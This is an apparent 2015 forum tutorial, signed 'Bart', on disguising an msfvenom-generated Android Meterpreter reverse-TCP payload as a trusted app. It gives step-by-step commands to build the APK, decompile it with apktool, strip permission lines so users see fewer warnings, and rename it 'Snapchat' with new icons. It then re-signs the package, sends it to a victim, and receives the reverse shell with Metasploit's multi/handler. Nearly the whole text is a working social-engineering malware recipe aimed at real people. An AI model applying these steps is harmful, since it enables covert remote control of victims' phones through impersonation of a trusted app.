How to Make Your Malicious Android App Be More Convincing.

Aug 9, 2015 09:42 PM
Aug 10, 2015 07:54 PM
635747281368342208.jpg

Well hello dear readers of Null byte,

let me start off stating english is not my first language and they will be some grammar mistakes. This also is my first tutorial so don't hesitate to give me feedback :)

You may have made a malicious apk (android package) before on kali, it is done the same way you make a malicious exe. Done by msfvenom.

In this short tutorial I will show you how to change the icon, permissions, and name of the app, to make it more convincing for your victim. Something which can be very relevant when you are Social Engineering someone.

Step 1: Making the Malicious Apk

So, lets start off by making our meterpreter apk. Enter this code in the terminal

msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk

This will create app.apk in your current folder.

Now comes the hard part.

Step 2: Installing Apktool

You will need to install Apktool on your system, I used windows for this, but it should be done the same way on linux/mac os. Since this is different for everybody I won't cover installing this tool. Check out their website for your system.

Do note that Apktool is installed by default in the reverse engineering toolkit from Kali linux!

Step 3: Decompiling Your Apk

First check if you can run apktool properly by running the command:

apktool

If you get the help menu, everything is installed correctly. Now run the command

apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder

apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files. Most likly:

  • The 'res' folder
  • The AndroidManifest.xml file
  • The 'smali' folder
  • The 'orginal' folder
  • The apktool.yml file

Step 4: Modifying the Files

For this tutorial we are only going to modify the AndroidManifest.xml file and the 'res' folder. First off, open the AndroidManifest.xml with your preffered text editor. I am using Notepad++.

You will see something like this:

635747256598654474.jpg

First off, lets delete a few lines we will probably not need and will give the user an extra warning.

Since nullbyte messes with symbols here is a pastebin with what to do

You're back? Great.

Now we are going into the 'res' folder. Here you will find 'values' folder, go into it. Now you will find 2 files, 1 named strings.xml, once again, open this xml file with your preffered text editor.

You will find the line MainActivity

Change '''MainActivity'' to you prefferd app name, I chose the name '''Snapchat''. But choose a name which you seem fit for your situation.

Save the file and go back up to the /res/ folder.

Create 3 folders named:

  • drawable-ldpi-v4
  • drawable-mdpi-v4
  • drawable-hdpi-v4

You will need now to find an appropriate icon set for your app.

I used the website's Android Asset Studio and resizeimage.net

The goal is to get 3 png files of the following sizes:

  • 36x36 (pixels) for the ldpi folder
  • 48x48 for the mdpi folder
  • 72x72 for the hdpi folder

Name these png files all 'icon.png' and place them in the appropriate folder.

Step 5: Compiling Your App

This process is very straight forward. Go back to the apktool terminal and enter the following command:

apktool b /pathtoyourfolder/folder

This will create an apk in the newly created 'dist' folder (found in apktool b /pathtoyourfolder/folder)

You thought we were done? Almost, just one more step.

Step 6: Signing the Apk

I here is a zip used for signing Original thread direct link or if that doesn't work this mega.co.nz link. Unzip the file and cd into the new folder, now use the command:

java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk

This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.

Step 7: Listing for the Connection

Now the final part,

open up metasploit using:

msfconsole

Open multi/handler

use multi/handler

set the payload

set payload

android/meterpreter/reversetcp


set LHOST and LPORT

set LPORT (your port)

set LHOST (your host)


and exploit

exploit

Now once the open up the app, you will get an incoming meterpreter shell, sweet right?

I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.

-Bart

Comments

No Comments Exist

Be the first, drop a comment!